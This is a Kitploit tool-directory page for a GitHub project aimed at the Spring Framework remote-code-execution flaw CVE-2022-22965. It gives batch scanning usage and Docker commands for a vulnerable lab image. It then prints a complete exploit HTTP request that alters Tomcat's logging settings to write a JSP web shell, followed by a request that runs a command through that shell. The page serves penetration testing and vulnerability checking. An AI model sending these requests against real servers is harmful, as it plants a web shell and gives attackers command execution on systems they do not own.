Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2022-22965-Spring-Core-Rce — 批量无损检测CVE-2022-22965 | Kitploit
Tools/GitHubGitHub/tangxiaofeng7/cve-2022-22965-spring-core-rce
Vulnerability ScannersContainer SecurityDynamic Analysis (Sandboxing)ExploitationWeb Application ExploitationPenetration Testing
GitHubtangxiaofeng7/cve-2022-22965-spring-core-rce

CVE-2022-22965-Spring-Core-Rce

批量无损检测CVE-2022-22965

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
View Repository
39144 years agoReviewed by Kitploit

Spring-Core JDK9+ RCE

Usage Instructions

root@kitploit:~
╰─ ./CVE-2022-22965 -h                                                                                                                                                                                                                                            ─╯
Single target: ./CVE-2022-22965 -u http://127.0.0.1:8080
Batch scan: ./CVE-2022-22965 -l url.txt 

Local Vulnerability Testing

0x01 Docker Image
root@kitploit:~
 docker pull vulfocus/spring-core-rce-2022-03-29
 docker run -itd -p 8080:8080 -P vulfocus/spring-core-rce-2022-03-29

-it: Enable input and connect to pseudo terminal -d: Run container in background -p: Port mapping

0x02 Local WAR File

Place the WAR file in the local webapps directory Switch JDK to version 9 or above (I'm using JDK 11), then start Tomcat Inject EXP:

root@kitploit:~
POST / HTTP/1.1
Host: 127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
suffix: %>
prefix: <%Runtime
Content-Type: application/x-www-form-urlencoded
Content-Length: 495

class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bprefix%7Di.getRuntime%28%29.exec%28request.getParameter%28%22cmd%22%29%29%3B%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell

Execute command:

root@kitploit:~
GET /shell.jsp?cmd=open%20/System/Applications/Calculator.app HTTP/1.1
Host: 127.0.0.1:8080

Download Tool